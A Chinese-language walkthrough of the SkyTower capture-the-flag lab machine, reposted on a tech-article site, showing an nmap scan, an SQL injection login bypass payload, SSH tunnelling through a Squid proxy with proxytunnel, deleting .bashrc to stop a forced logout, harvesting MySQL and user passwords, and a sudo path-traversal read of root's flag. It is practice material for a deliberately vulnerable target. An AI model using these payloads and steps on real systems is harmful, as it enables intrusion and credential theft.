IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 【靶机渗透】SkyTower渗透练习_proxytunnel设置代理服务器隧道+.bashrc文件概念 -> 正文阅读

[系统运维]【靶机渗透】SkyTower渗透练习_proxytunnel设置代理服务器隧道+.bashrc文件概念

SkyTower靶机:

1.主机发现:arp-scan -l,发现靶机ip为192.168.225.168

2.nmap扫描端,口扫描到22和80端口,访问80端口:

nmap 192.168.225.168 -sV -sC -Pn -n -v -T5 -p-

?

但是注意:这里的22端口被过滤了,百度查询squid发现这个是用来设置代理的

3.现在访问一下网站,看到登录框,测试发现存在注入漏洞:

4.因为过滤了and,将其替换为||

123' || 1=1#

5.爆出一个john的用户名和密码,并且提示需要ssh进行远程登录:

Username:john

Password:hereisjohn

6.经测试ssh无法进行远程登陆,猜测该账户为内网账户,所以考虑设置代理进行穿透:

proxytunnel -a 1234 -p 192.168.225.168:3128 -d 192.168.225.168:22

-a 指定本地侦听端口
-p 使用代理IP和端口
-d 指定访问的目标和端口

7.连接目标靶机:

ssh john@127.0.0.1 -p 1234

连接成功但是立马就退出了,推测应该跟该用户下的.bashrc文件设置的内容有关。

补充知识点:

.bashrc文件主要保存个人的一些个性化设置,如命令别名、路径等。也即在同一个服务器上,只对某个用户的个性化设置相关。它是一个隐藏文件,需要使用ls -a来查看。

.bash_history? ??记录之前输入的命令

.bash_logout? ???当你退出时执行的命令

.bash_profile??? 当你登入shell时执行

.bashrc????? ?????当你登入shell时执行

后两个的区别:'.bash_profile'只在会话开始时被读取一次,而'.bashrc'则每次打开新的终端时,都要被读取。

这些文件是每一位用户对终端功能和属性设置,修改.bashrc可以改变环境变量PATH、别名alias和提示符。

除了可以修改用户目录下的.bashrc文件外,还可以修改如“/etc/profile”文件、“/etc/bashrc”文件及目录“/etc /profile.d”下的文件。但是修改/etc路径下的配置文件将会应用到整个系统,属于系统级的配置,而修改用户目录下的.bashrc则只是限制在用户应用上,属于用户级设置。两者在应用范围上有所区别,建议如需修改的话,修改用户目录下的.bashrc,即无需root权限,也不会影响其他用户。

8.发送命令查看.bashrc文件,可以查看到最后一行有exit命令,这会在连接之后立马退出

ssh john@127.0.0.1 -p 1234 cat .bashrc

9.把这个文件删除即可成功登录:

ssh john@127.0.0.1 -p 1234 rm .bashrc

提权:

1.sudo -l无法查找到提权信息。

2.这里还有一个思路就是查看数据库账户密码,前往网站目录,在login.php里发现了mysql的登录用户及密码

cd /var/www
cat login.php

3.登录数据库查看信息:

mysql -uroot -proot
show databases;
use SkyTech;
show tables;
select * from login;

4.查看到sara和william用户的密码,使用sara进行远程登陆(先删除他的.bashrc文件)

ssh sara@127.0.0.1 -p 1234 rm .bashrc
ssh sara@127.0.0.1 -p 1234
sudo -l

5.检查sudo权限,发现可以使用cat和ls命令,所以可以使用相对路径直接读取root根目录下的flag.txt

sudo cat /accounts/../root/flag.txt

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-08-31 15:52:22  更:2021-08-31 15:52:55 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/29 9:55:25-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计